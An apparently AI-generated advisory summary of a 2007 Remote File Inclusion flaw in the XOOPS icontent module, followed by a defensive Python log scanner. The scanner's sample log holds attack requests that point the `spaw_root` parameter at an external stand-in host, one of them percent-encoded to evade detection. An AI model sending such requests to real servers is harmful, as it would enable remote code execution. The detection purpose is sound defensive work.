This is a summary of the AI-generated 10-question deep analysis.
Q1 What is this vulnerability? (Essence + Consequences)
**Essence**: Remote File Inclusion (RFI) in XOOPS icontent. **Consequences**: Attackers inject malicious PHP code via the `spaw_root` parameter, leading to **Remote Code Execution (RCE)** on the server.…
**Root Cause**: Flawed input validation in `include/wysiwyg/spaw_control.class.php`. The application blindly includes files based on the `spaw_root` URL parameter without sanitization.…
**Affected**: XOOPS icontent module. **Component**: `spaw_control.class.php`. **Timeline**: Published June 6, 2007. **Scope**: Any instance running this specific module version with the vulnerable file present.
Q4 What can hackers do? (Privileges/Data)
**Privileges**: Full Remote Code Execution. **Data**: Attackers can read/write any file accessible to the web server process. **Impact**: Can install backdoors, deface sites, or pivot to internal networks.…
**Auth**: Likely **No Authentication** required for the initial inclusion vector. **Config**: Requires the vulnerable module to be installed and accessible. **Threshold**: **Low**.…
**Public Exploit**: **YES**. **Sources**: Exploit-DB #4022, Milw0rm, Secunia Advisory 25522. **Proof**: Mailing list posts from June 2007 confirm active exploitation. Wild exploitation is highly probable.
Q7 How to self-check? (Features/Scanning)
**Check**: Scan for `spaw_control.class.php` in web roots. **Test**: Look for `spaw_root` parameter in HTTP requests. **Tools**: Use WAF logs or vulnerability scanners to detect RFI patterns targeting this file.…
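An added example, not part of the original analysis: one way to run the Q7 check over web-server access logs, separating requests that merely set `spaw_root` from those that point it at an external URL. The log lines, the `/modules/icontent/` path prefix and the rule that any `scheme://` value counts as external are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [06/Jun/2007:10:01:02 +0000] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://remote.example/x.txt? HTTP/1.1" 200 512
198.51.100.7 - - [06/Jun/2007:10:01:09 +0000] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=hTtP%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 512
203.0.113.5 - - [06/Jun/2007:10:02:00 +0000] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=../wysiwyg/ HTTP/1.1" 200 90
203.0.113.9 - - [06/Jun/2007:10:03:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 4096
"""

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: any "scheme://" value counts as an external URL.
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding with a bounded number of passes."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def classify(target):
    """Return 'remote', 'present' or None for one request target."""
    verdict = None
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name != "spaw_root":
            continue
        if REMOTE.match(fully_decode(value)):
            return "remote"  # spaw_root points at an external URL
        verdict = "present"  # parameter set, but not to a URL
    return verdict


def scan(log_text):
    """Return (client_ip, verdict, target) for every line that sets spaw_root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        verdict = classify(m.group("target")) if m else None
        if verdict:
            hits.append((m.group("ip"), verdict, m.group("target")))
    return hits


if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Only query-string parameters are inspected, because request bodies do not appear in standard access logs.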
**Official Fix**: Data implies it's a known issue (duplicate of CVE-2006-4656). **Status**: Legacy vulnerability (2007). **Action**: Update XOOPS/icontent to the latest patched version if available.…
**Workaround**: Remove or disable the `icontent` module. **Block**: Use WAF/IPS to block requests containing `spaw_root` with external URLs.…
**Priority**: **CRITICAL** for legacy systems. **Urgency**: High if the system is still online. **Context**: Old vuln, but RFI is deadly. **Advice**: Patch immediately or isolate the server.…